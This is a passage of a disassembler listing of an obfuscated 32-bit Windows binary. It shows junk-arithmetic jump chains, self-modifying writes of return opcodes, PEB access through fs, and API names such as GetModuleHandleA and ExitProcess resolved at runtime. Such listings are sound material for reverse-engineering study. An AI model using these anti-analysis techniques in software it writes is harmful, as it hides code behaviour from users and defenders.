; ---------------------------------------------------------------------------
		and	esi, 85DF1585h
		jmp	sub_48E8DE
; ---------------------------------------------------------------------------
		dd 0C881C0D1h, 0EAE7EF90h, 48C94168h, 0E106E900h, 0FFFFh
		dd 0CF0CE381h, 31E98F04h, 15h
		db  68h	; h
		db 0D5h	; 
		db 0E0h	; 
		db  48h	; H
		db    0
		db 0E9h	; 
		db 0CDh	; 
		db  33h	; 3
		db    0
		db    0
		align 4

locret_48B938:				; CODE XREF: ss.cste0:loc_48E1EAj
		retn
; ---------------------------------------------------------------------------
		db 2 dup(0), 0E9h
		dd 0FFFFF951h, 60E80000h
		db 35h,	2 dup(0)
byte_48B947	db 90h			; DATA XREF: sub_48A195+1435o
; ---------------------------------------------------------------------------
		call	sub_48ED48
		push	489A30h
		jmp	loc_48C3C0
; ---------------------------------------------------------------------------
		jle	loc_48E25A
		jmp	loc_48D578
; ---------------------------------------------------------------------------
		align 4
		retn
; ---------------------------------------------------------------------------
		align 2

loc_48B966:				; CODE XREF: sub_48A195+50Ej
		jmp	locret_48ACEF
; ---------------------------------------------------------------------------
		pushf
		jmp	sub_48C82C
; ---------------------------------------------------------------------------
		align 2
		shl	ecx, 14h
		xor	eax, 0B8F508BAh
		jmp	sub_48CE1E
; ---------------------------------------------------------------------------
		dd 598701C6h, 2414259Dh, 0FFF671E9h, 0E80000FFh, 1834h
		dd 48B98068h, 0DEB4E900h, 0FFFFh, 0DAE2C081h, 0E0818366h
		dd 9D072CB1h, 9DFBC081h, 0E99DF844h, 136Bh, 0C0090000h
		dd 2562840Ah, 8F640000h, 5, 0C0506800h,	7AE90048h, 6, 0C4C6815Eh
		dd 0F78ACEB0h, 80C6h, 0F991E900h, 0FFFFh, 0E4BB890Fh, 0CB85FFFFh
		dd 0FFECE2E9h
		db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------

loc_48B9F7:				; CODE XREF: sub_48A195+30CDj
		jnz	loc_48E074

loc_48B9FD:				; CODE XREF: sub_48A195+211Aj
		jmp	loc_48B5B1
; ---------------------------------------------------------------------------
		dw 0F00h
		dd 12B189h, 0BCC68100h,	0E99B98E5h, 265Bh, 0E4C081C3h
		dd 0E8656C88h, 0FFFFF5DEh, 48C06568h, 14F6E900h, 3F680000h
		dd 5829F45Dh
; ---------------------------------------------------------------------------

loc_48BA30:				; CODE XREF: sub_48A195+12CEj
		xor	eax, 0D515CEE1h
		rol	eax, 1Ah
		test	eax, 8000h
		jmp	loc_48E662
; ---------------------------------------------------------------------------
		dd 2FB2840Fh, 14870000h, 408B5A24h, 0A8976868h,	0BDE90048h
		db 0FDh, 2 dup(0FFh)
byte_48BA5B	db 8Dh			; DATA XREF: sub_48A195+261Do
		dd 48DFAE05h, 895E800h,	0
; ---------------------------------------------------------------------------
		jmp	loc_48B8F7
; ---------------------------------------------------------------------------
		db 2 dup(0), 58h
; ---------------------------------------------------------------------------
		xor	eax, 0B78C7F43h
		add	eax, 16F01416h
		xchg	eax, [esp-4+arg_0]
		jmp	sub_48D4FC
; ---------------------------------------------------------------------------
		dd 0E9EF8700h, 0BA3h, 1C600C3h,	3487598Bh, 5ECE8B24h, 0FFFA63E9h
		db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------

loc_48BA9F:				; CODE XREF: sub_48A195:loc_48A771j
		mov	byte ptr [edx],	0Fh
		pop	edx
		call	sub_48D04D

locret_48BAA8:				; CODE XREF: sub_48D700:loc_48C0E2j
		retn
; ---------------------------------------------------------------------------

loc_48BAA9:				; CODE XREF: ss.cste0:0048DC61j
		jmp	loc_48E48A
; ---------------------------------------------------------------------------
		align 10h

loc_48BAB0:				; CODE XREF: sub_48A195+D37j
		jmp	loc_48ADE4
; ---------------------------------------------------------------------------
		jnp	loc_48D15C

loc_48BABB:				; CODE XREF: sub_48A195+46F8p
		xchg	esi, [esp+4+var_4]
		pop	esi
		xchg	edx, [esp+0]
		jmp	loc_48AFFE
; ---------------------------------------------------------------------------
		db 0E9h
		dd 0FFFFF66Fh, 16E3E900h, 0
		dd 810BC0C1h, 0EDABE4F8h, 0EED6E9D4h
		db 2 dup(0FFh),	0
; ---------------------------------------------------------------------------

loc_48BAE3:				; CODE XREF: sub_48A195+17j
		and	eax, 0F6B1774Eh
		add	eax, 599728E9h
		jmp	loc_48E676
sub_48A195	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		dd 0EA810000h, 0DE0F04CCh, 1DD8C281h, 876A605Ah, 0F3E92414h
		dd 0E9FFFFF4h, 0F5h, 0FDE90000h, 0FFFFEDh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48BB18:				; CODE XREF: sub_48A195:loc_48C099j
		mov	eax, large fs:18h
		add	eax, 0CAD4E5D6h
		push	esi
		jmp	loc_48E33D
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		dd 0A7E90000h, 0FFFFE8h, 2CEFE9h, 81000000h, 6AE98BF0h
		dd 0E458E973h, 0C100FFFFh, 0A8E911E1h, 20h, 86C56800h
		dd 487EBC1h, 839D5824h,	0E9001078h, 0FFFFEE66h
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48BE7A

loc_48BB66:				; CODE XREF: sub_48BE7A+Fj
		mov	byte ptr [ecx],	0C3h
		xchg	esi, [esp+0]
		mov	ecx, esi
		pop	esi
		pop	eax
		xchg	esi, [esp+0]
		mov	ebp, esi
		jmp	loc_48CBF9
; END OF FUNCTION CHUNK	FOR sub_48BE7A
; ---------------------------------------------------------------------------
		align 4
		dd 87241C87h, 0DE8B2434h, 7B800F5Eh, 0E9FFFFEAh, 2060h
		dd 60E98100h, 81F7E089h, 0AD6717C1h, 240C8718h,	0FFED7BE9h
		dd 8B5700FFh, 243C87FDh, 86E9E98Bh, 0Eh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48E3C8

loc_48BBB4:				; CODE XREF: sub_48E3C8:loc_48CB5Bj
		mov	ecx, esi
		xchg	edx, [esp+0]
		mov	esi, edx
		pop	edx
		xor	eax, eax
		retn
; END OF FUNCTION CHUNK	FOR sub_48E3C8
; ---------------------------------------------------------------------------
		align 10h
; START	OF FUNCTION CHUNK FOR sub_48C150

loc_48BBC0:				; CODE XREF: sub_48C150+36Cj
		jmp	near ptr dword_489CE8+39h
; END OF FUNCTION CHUNK	FOR sub_48C150
; ---------------------------------------------------------------------------
		db  87h	; 
		db  0Ch
		db  24h	; $
; ---------------------------------------------------------------------------

loc_48BBC8:				; DATA XREF: sub_48A195:loc_48B8EDo
		dec	edi
		adc	eax, offset dword_45D0C0
		push	edi
		mov	edi, ebx
		xchg	edi, [esp]
		jmp	loc_48D18F
; ---------------------------------------------------------------------------
		db 2 dup(0), 0Fh
		dd 18C58Ch, 819D0000h, 8F2C76C1h, 18ADE993h, 55000000h
		dd 2C87EB8Bh, 0BDD4BB24h, 38E90048h, 2Bh
; ---------------------------------------------------------------------------

loc_48BC00:				; DATA XREF: sub_48A195:loc_48DEC7o
		push	offset sub_48C0E7
		jmp	locret_48DA6E
; ---------------------------------------------------------------------------
		align 4

loc_48BC0C:				; DATA XREF: ss.cste0:0048E31Ao
		push	eax
		mov	eax, offset loc_48BC1E
		jmp	loc_48DDED
; ---------------------------------------------------------------------------
		align 4
		dd 0E8B0E800h
		db 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_48BC1E:				; DATA XREF: ss.cste0:0048BC0Do
		lea	eax, loc_48A2F5
		push	offset dword_48E2E4
		jmp	locret_48C48F
; ---------------------------------------------------------------------------
		dw 840Fh
		dd 0FFFFF586h, 1889C68Bh, 0E90CCDC1h, 0FFFFF573h, 0F6E9820Fh
		dd 8D0FFFFFh, 0FFFFFF30h, 0C428C681h, 3487BA5Dh, 263DE924h
		dd 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CF06

loc_48BC5C:				; CODE XREF: sub_48CF06:loc_48CF0Aj
		call	sub_48D886

loc_48BC61:				; CODE XREF: ss.cste0:0048C279j
		push	edi
		push	182E0522h
		pop	edi
		and	edi, 0CD2B8B85h
		cmp	edi, 5D26EDDAh
		jmp	near ptr dword_489C18+2Dh
; END OF FUNCTION CHUNK	FOR sub_48CF06
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------

loc_48BC7A:				; CODE XREF: ss.cste0:0048E9BBj
		jmp	locret_48CCB6
; ---------------------------------------------------------------------------
		align 10h
		dd 0C701C600h, 1FC6E859h, 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48E3F4

loc_48BC8C:				; CODE XREF: sub_48E3F4+1Aj
		jmp	near ptr dword_48A32C+28h
; END OF FUNCTION CHUNK	FOR sub_48E3F4
; ---------------------------------------------------------------------------
		db 2 dup(0), 51h
; ---------------------------------------------------------------------------
		mov	ecx, edi
		xchg	ecx, [esp]
		mov	edi, offset loc_48D359
		jmp	loc_48D353
; ---------------------------------------------------------------------------
		align 4
		dd 874903C6h, 0DF8B243Ch, 0EA7CE85Fh, 8700FFFFh, 9D582404h
		dd 0E9241487h, 0FFFFFB3Fh, 0F9E90000h, 0FFFFEAh, 2226E9h
		dd 68000000h, 0AF9E9788h, 8B240487h, 0C18158C8h, 808E0D15h
		dd 0E3DDBE56h, 0FFE90048h, 2Dh
dword_48BCEC	dd 87240487h, 0C68B2434h, 0D13E685Eh, 0E95AC562h, 0FFFFE6B5h
					; DATA XREF: sub_48A195+CCFo
		db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_538. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48E74D

loc_48BD02:				; CODE XREF: sub_48A195+4E2j
					; sub_48E74D:loc_48D4F0j
		push	489883h
		jmp	near ptr dword_489788+0F9h
; END OF FUNCTION CHUNK	FOR sub_48E74D
; ---------------------------------------------------------------------------
		dd 9B840F00h, 0E9FFFFF6h, 0FFFFF73Ah, 1C870000h, 0D9685B24h
		dd 0E90048DCh, 1FAEh, 58B6400h,	30h, 493F6851h,	0C159ECA9h
		dd 0C1811DC1h, 9A155E88h, 0E902C1C1h, 21D0h, 0C30000h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48BD4D:				; CODE XREF: sub_48A195:loc_48B42Fj
		jmp	loc_48D8D9
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 4
		jmp	loc_48A70C
; ---------------------------------------------------------------------------
		db 0BFh, 4Eh, 0FBh
		dd 820FEDA2h, 0C75h, 0F081C187h, 0C2C3E9F8h, 0FFE0C9E9h
		dd 0C08D0FFFh, 1Dh, 1A05E9h, 0F8230000h, 1DADE9h
		db 2 dup(0)
word_48BD86	dw 8B5Eh		; DATA XREF: sub_48A195+A79o
		dd 0EF7AE800h
		db 2 dup(0FFh),	0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48BD8F:				; CODE XREF: sub_48A195+312Aj
		jmp	loc_48E21B
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		dd 6BE90000h, 28h
; ---------------------------------------------------------------------------

locret_48BD9C:				; CODE XREF: ss.cste0:0048EBB5j
		retn
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_489F18

loc_48BD9F:				; CODE XREF: sub_489F18+9j
		jmp	loc_48C6C5
; END OF FUNCTION CHUNK	FOR sub_489F18
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48BDA5:				; CODE XREF: sub_48A195:loc_48B4BEj
		mov	dword ptr [ebp-14h], 32336C65h
		push	offset loc_489E27
		jmp	nullsub_528
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 4

loc_48BDB8:				; CODE XREF: ss.cste0:0048E5F2j
		test	edi, 0EC2D19F7h
		jmp	loc_48E76A
; ---------------------------------------------------------------------------
		align 4
		dd 0D0E78100h, 0C1F63570h, 0C7811EC7h, 0CEC869DCh, 0E9243C8Fh
		dd 0FFFFEE23h, 30058B64h, 81000000h, 0B6048AC0h, 0DED8E875h
		db 2 dup(0FFh),	0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48BDEF:				; CODE XREF: sub_48A195:loc_48B648j
		sub	edi, 6B6F7162h
		add	edi, 449F141h
		add	eax, edi
		push	offset dword_48A610
		jmp	nullsub_529
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 4
dword_48BE08	dd 0F213D0F7h, 0FFE165E9h, 6C0000FFh, 9CE92404h, 0E9FFFFDCh
		dd 0FFFFEAA8h, 0EAEEE900h, 6800FFFFh, 48E8B5h, 27B3E9h
		dd 0C300h, 87D38B52h, 0D98B2414h, 1800E9h, 0E9C11300h
		dd 1A25h, 0C7F08100h, 527FFB7Ah, 7A3F689Ch, 815AD571h
		dd 593025E2h, 0B3FE91Ch, 0
; ---------------------------------------------------------------------------

loc_48BE64:				; CODE XREF: ss.cste0:0048C0A0j
		add	eax, 8A827F43h
		push	esi
		mov	esi, eax
		xchg	esi, [esp]
		call	sub_48D4FC
		jmp	locret_48D0B6

; =============== S U B	R O U T	I N E =======================================



sub_48BE7A	proc near		; CODE XREF: sub_48E438:loc_489A2Ap

arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 00489FFE SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0048BB66 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0048CBF9 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		xchg	ebp, [esp+0]
		mov	ecx, ebp
		pop	ebp
		push	ecx
		mov	ecx, offset nullsub_531
		jmp	loc_48BB66
sub_48BE7A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		dw 0F00h
		dd 228981h, 2735E900h, 860F0000h, 0FFFFEF1Dh, 0C23B0F87h
		dd 0FFF4F7E9h, 5A0000FFh, 0DF2E8h, 23E90000h, 0FFFFEBh
		dd 0D887F703h, 25F8E9h,	0C0E08100h, 81E8A2C2h, 0A54F1CC0h
		db 0BFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48BECD:				; CODE XREF: sub_48A195+1429j
		call	sub_48E3F4
		add	cl, ch
		rcl	byte ptr [edi],	cl
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		dw 0
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48BED9:				; CODE XREF: sub_48A195+1019j
		jmp	nullsub_570
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 10h
		jo	loc_48DFF7

; =============== S U B	R O U T	I N E =======================================



sub_48BEE6	proc near		; CODE XREF: sub_48A195:loc_48DD9Dp

; FUNCTION CHUNK AT 0048C5BD SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0048DDCD SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		call	nullsub_540
		push	edx
		push	0A19BABAEh
		pop	edx
		jmp	loc_48C5BD
sub_48BEE6	endp

; ---------------------------------------------------------------------------
		align 4
		dd 24348700h, 0EB8B555Eh, 68242C87h, 48B387h, 2A6FE9h
					; CODE XREF: ss.cste0:0048D9E9p
		dd 0F5F0000h, 1FDA84h, 1503E800h, 0
; ---------------------------------------------------------------------------

loc_48BF20:				; CODE XREF: ss.cste0:0048CB18j
		jmp	loc_48CB1F
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48BF27:				; CODE XREF: sub_48A195+3719j
		xchg	ecx, [esp-10h+arg_C]
		push	584B64CFh
		pop	edi
		or	edi, 0E3787ABDh
		add	edi, 4CD4D51h
		jmp	loc_48AA4D
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 2
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48BF42:				; CODE XREF: sub_48A195+4312j
		push	esi
		mov	esi, eax
		xchg	esi, [esp-0Ch+arg_8]
		call	ds:dword_45D0B4	; GetModuleHandleA
		push	ebx
		mov	ebx, offset loc_48C373
		jmp	loc_48D3CF
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		dw 0E900h
; ---------------------------------------------------------------------------
		mov	ebp, 18h
; START	OF FUNCTION CHUNK FOR sub_48CF58

loc_48BF61:				; CODE XREF: sub_48CF58+8ACj
		jmp	loc_48DC7B
; END OF FUNCTION CHUNK	FOR sub_48CF58
; ---------------------------------------------------------------------------
		dw 0C6F7h
		dd 10000h, 0FFF547E9h, 0C60000FFh, 0AC5B3103h, 0B6E8C201h
		dd 0FFFFDBh
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48BF81:				; CODE XREF: sub_48A195+466j
		jmp	loc_48C0A7
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 4
		dd 89CDC7F7h, 0E9E9FA48h, 0FFFFE9h
		db 0
; ---------------------------------------------------------------------------

loc_48BF95:				; DATA XREF: sub_48A195:loc_48AAACo
		push	edi
		mov	edi, ecx
		xchg	edi, [esp]
		mov	ecx, 48BC52h
		jmp	loc_48E316
; ---------------------------------------------------------------------------
		db 2 dup(0), 53h
		dd 48E37368h, 0DD35E900h
		db 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_48BFB2:				; DATA XREF: sub_48A195+2A8o
		push	0BBD77CBAh
		xchg	esi, [esp]
		mov	eax, esi
		pop	esi
		add	eax, 0BEEB9E95h
		and	eax, 0CDABB0BDh
		sub	eax, 7AC89310h
		jmp	loc_48E418
; ---------------------------------------------------------------------------
		db 2 dup(0)

; =============== S U B	R O U T	I N E =======================================



sub_48BFD6	proc near		; DATA XREF: sub_48A195:loc_48E85Bo

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0048EBA9 SIZE 00000005 BYTES

		push	ebp
		mov	ebp, ebx
		xchg	ebp, [esp+4+var_4]
		push	0DA5DFE0Dh
		pop	ebx
		or	ebx, 0C64E1E3Bh
		xor	ebx, 0BB5C31D3h
		add	ebx, 9B44D303h
		jmp	loc_48EBA9
sub_48BFD6	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		push	8DA8C0C1h
		pop	ecx
		or	ecx, 84B42219h
		rol	ecx, 19h
		jmp	loc_48E0CA
; ---------------------------------------------------------------------------
		db 55h,	0Fh, 88h
		dd 0FFFFDD70h, 0FFE9F3E9h, 810000FFh, 643994F3h, 0E8DD0303h
		dd 0FFFFE795h, 1EC6C100h, 0A44CC681h, 0C6C17811h, 82F6810Dh
		dd 0E951DFB8h, 0FFFFEBCCh
		db 2 dup(0)
word_48C042	dw 128Bh		; DATA XREF: sub_48A195:loc_48B83Fo
dword_48C044	dd 0E8241475h, 7B0h, 0C300h, 0B804C483h, 52h, 87DF8B53h
					; DATA XREF: sub_48A17A+5o
		dd 0C3E8241Ch, 0Eh, 0E4D9E900h,	0FFFFh,	0EB28810Fh, 0BE8FFFFh
		dd 0F6FFFFE9h, 0F01DD45h, 684h,	1CB6E900h, 0E8000000h
		dd 1882h, 96E90000h
		db 3 dup(0FFh)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48C093:				; CODE XREF: sub_48A195+1273j
		jmp	nullsub_567
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48C099:				; CODE XREF: sub_48A195+DC2j
		jmp	loc_48BB18
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 10h
		jmp	loc_48BE64
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48C0A7:				; CODE XREF: sub_48A195:loc_48BF81j
		add	ecx, 2BF70686h
		xchg	ecx, [esp+0Ch+var_C]
		retn
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 2

loc_48C0B2:				; CODE XREF: ss.cste0:0048E005j
		jmp	loc_48D30E
; ---------------------------------------------------------------------------
		align 4
		dd 8310EF00h, 10E904C0h, 0FFFFFEh, 48E4D168h, 0D999E900h
		dd 0FFFFh, 0F710C0C1h, 0C0h, 1EE0E920h,	0
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		align 2
; START	OF FUNCTION CHUNK FOR sub_48D700

loc_48C0E2:				; CODE XREF: sub_48D700+6j
		jmp	locret_48BAA8
; END OF FUNCTION CHUNK	FOR sub_48D700

; =============== S U B	R O U T	I N E =======================================



sub_48C0E7	proc near		; DATA XREF: ss.cste0:loc_48BC00o

; FUNCTION CHUNK AT 0048CBC0 SIZE 0000000A BYTES

		mov	ebx, 48AB85h
		jmp	loc_48CBC0
sub_48C0E7	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 68h,	0CDh, 0A5h
		dd 4FE90048h, 0FFFFFCh,	87F08B00h, 0C87243Ch, 59F98B24h
		dd 874907C6h, 0FA8B2414h, 0FFDF6CE9h
		db 0FFh, 2 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_542. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		jmp	loc_48EC50

; =============== S U B	R O U T	I N E =======================================



sub_48C11D	proc near		; DATA XREF: sub_48A195+4013o
		add	edx, 73E913FEh
		call	sub_48D830
		add	cl, ch
		and	eax, 0FFFFFFh
		add	[ecx-1959201Eh], al
		db	2Eh
		push	offset loc_48AAB6
		jmp	nullsub_562
sub_48C11D	endp

; ---------------------------------------------------------------------------
		dd 122C880Fh, 6FE90000h, 0FFFFDBh
		db 0
; ---------------------------------------------------------------------------

locret_48C14D:				; CODE XREF: ss.cste0:0048A13Ej
		retn
; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_48C150	proc near		; CODE XREF: ss.cste0:loc_48D270p

; FUNCTION CHUNK AT 0048BBC0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048C4AA SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0048CC88 SIZE 0000000B BYTES

		xchg	edx, [esp+0]
		xchg	esi, [esp+0]
		mov	edx, esi
		pop	esi
		call	ds:dword_45D0C0	; ExitProcess
		jmp	loc_48CC88
sub_48C150	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48C164:				; CODE XREF: sub_48A195:loc_48A8E1j
		lea	eax, locret_48B3DF
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_538
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 4
; START	OF FUNCTION CHUNK FOR sub_48CE1E

loc_48C174:				; CODE XREF: sub_48CE1E:loc_48CBE8j
		pop	edi
		or	edi, 5E8E9C34h
		add	edi, 6B9AF2FCh
		and	edi, 0E350605h
		rol	edi, 1Dh
		jnb	near ptr dword_489788+0BCh
; END OF FUNCTION CHUNK	FOR sub_48CE1E
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48E438

loc_48C191:				; CODE XREF: sub_48E438+9j
		jmp	loc_489A2A
; END OF FUNCTION CHUNK	FOR sub_48E438
; ---------------------------------------------------------------------------
		dw 9D00h
		dd 0FFD6A1E9h, 0DA3B00FFh, 2849E9h, 0F0810000h,	0A3E3FB10h
		dd 268FE881h, 0E0817953h, 0B03C5F43h, 4686E881h, 0C0814446h
		dd 947B09ABh, 48CD6768h, 183AE900h
		db 3 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DE06

loc_48C1CF:				; CODE XREF: sub_48DE06+Dj
		and	esi, 33898BC4h
		xor	esi, 0D99EE2B5h
		and	esi, 0A48B5D36h
		add	esi, 603D5FD8h
		jmp	loc_48B7E9
; END OF FUNCTION CHUNK	FOR sub_48DE06
; ---------------------------------------------------------------------------
		dd 0CB3B0000h, 2398E9h,	9D000000h, 155FE85Dh
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48C1FE:				; CODE XREF: sub_48A195:loc_48DA78j
		rol	edx, 17h
		jnb	near ptr dword_48ADA4+24h
		adc	ecx, 0D2FD5FB0h
		adc	ebx, 0C1BFF918h
		mov	edi, 6B6F10B2h
		jmp	near ptr dword_48ADA4+24h
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48C21F:				; CODE XREF: sub_48A195:loc_48D1E9j
		or	ecx, 5F7AD986h
		push	edx
		mov	edx, offset word_48CC12
		jmp	loc_48DDA8
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		dd 0CE810000h, 0C9680851h, 0DDE90287h, 56FFFFDFh, 0C1FC4D68h
		dd 2404873Ch, 77E9F08Bh, 8, 33308900h, 0E1B2E9E9h, 0E9C3FFFFh
		dd 0FFFFE8EEh, 1E82E9h
		db 3 dup(0)
; ---------------------------------------------------------------------------

loc_48C267:				; DATA XREF: ss.cste0:0048DD77o
		push	8C13968h
		pop	eax
		xor	eax, 0BD619C0Bh
		sub	eax, 514E0898h
		jmp	loc_48BC61
; ---------------------------------------------------------------------------
		align 10h
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48C280:				; CODE XREF: sub_48A195:loc_48D7E1j
		add	eax, ebp
		add	eax, 3FE230B2h
		mov	eax, [eax]
		xchg	eax, [esp+10h+var_10]
		jmp	loc_48AFD8
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		xor	eax, ebp
		push	edx
		jmp	loc_48CB0B
; ---------------------------------------------------------------------------
		align 4
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48C29C:				; CODE XREF: sub_48A195+297j
		mov	byte ptr [edx],	3
		pop	edx
		mov	esi, edx
		xchg	esi, [esp-8+arg_4]
		add	eax, 4
		call	sub_4895E6
		mov	edx, [eax]
		jmp	loc_48B9FD
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		dd 86C08100h, 68E3ED9Eh, 48A087h, 0FFDC79E9h, 689C00FFh
		dd 956A6C84h, 0D6E7815Fh, 81AF7C6Fh, 221DE0CFh,	0CC7C152h
		dd 2EF9F781h, 0A1E96B4Ah, 0FFFFE9h
		db 0

; =============== S U B	R O U T	I N E =======================================



sub_48C2E9	proc near		; CODE XREF: sub_48A195+12D4j
					; sub_48A195:loc_48C8E0p

; FUNCTION CHUNK AT 0048C7BC SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048DBEA SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		xor	esi, 4A660C89h
		add	esi, ebp
		jmp	loc_48DBEA
sub_48C2E9	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		dw 8700h
; ---------------------------------------------------------------------------
		xor	al, 24h
		pop	esi
		mov	byte ptr [eax],	0C3h
		push	edi
		jmp	loc_48D72C
; ---------------------------------------------------------------------------
		sbb	ecx, edx
		jmp	loc_48EA51
; ---------------------------------------------------------------------------
		align 10h
		dd 0E24A8D0Fh, 0FFFFh, 0FFDDB3E9h, 810000FFh, 3D48A5C9h
		dd 0E230E936h, 0C3FFFFh
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48C32D:				; CODE XREF: sub_48A195+2D5Ej
		jb	near ptr byte_48AED1+2

loc_48C333:				; CODE XREF: sub_48A195:loc_48C915j
		or	edx, 180E3894h
		add	edx, 6230C324h
		test	eax, edx
		push	48DFE8h
		jmp	locret_48B2DD
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		db 87h
		dd 34872414h, 5ED68B24h, 258964h
		db 3 dup(0)
byte_48C35B	db 64h			; DATA XREF: sub_489F18+27AEo
		dd 30058Bh, 0BEE90000h,	87FFFFDCh, 5B5B241Ch, 56E845C7h
		db 69h,	72h, 74h
; ---------------------------------------------------------------------------

loc_48C373:				; DATA XREF: sub_48A195+1DBAo
		mov	dword ptr [ebp-14h], 516C6175h
		mov	dword ptr [ebp-10h], 79726575h
		jmp	loc_48C8B0
; ---------------------------------------------------------------------------
		dw 0BA00h
; ---------------------------------------------------------------------------
		popa
		mov	byte ptr [ecx],	0C6h
		jmp	loc_48D90E
; ---------------------------------------------------------------------------
		align 2
		xchg	edi, ebx
		jmp	loc_48EADF
; ---------------------------------------------------------------------------
		db 2 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_578. PRESS KEYPAD	"+" TO EXPAND]
		dd 0E5CDE900h, 0FFFFh

; =============== S U B	R O U T	I N E =======================================



sub_48C3A4	proc near		; CODE XREF: sub_48A195+1181j
					; ss.cste0:0048EAE3p
		xchg	ebx, [esp+0]
		pop	ebx
		push	98E6F49h
		xchg	edi, [esp+0]
		mov	ecx, edi
		pop	edi
		rol	ecx, 9
		push	edx
		jmp	near ptr dword_48A720+2Bh
sub_48C3A4	endp

; ---------------------------------------------------------------------------
		retn
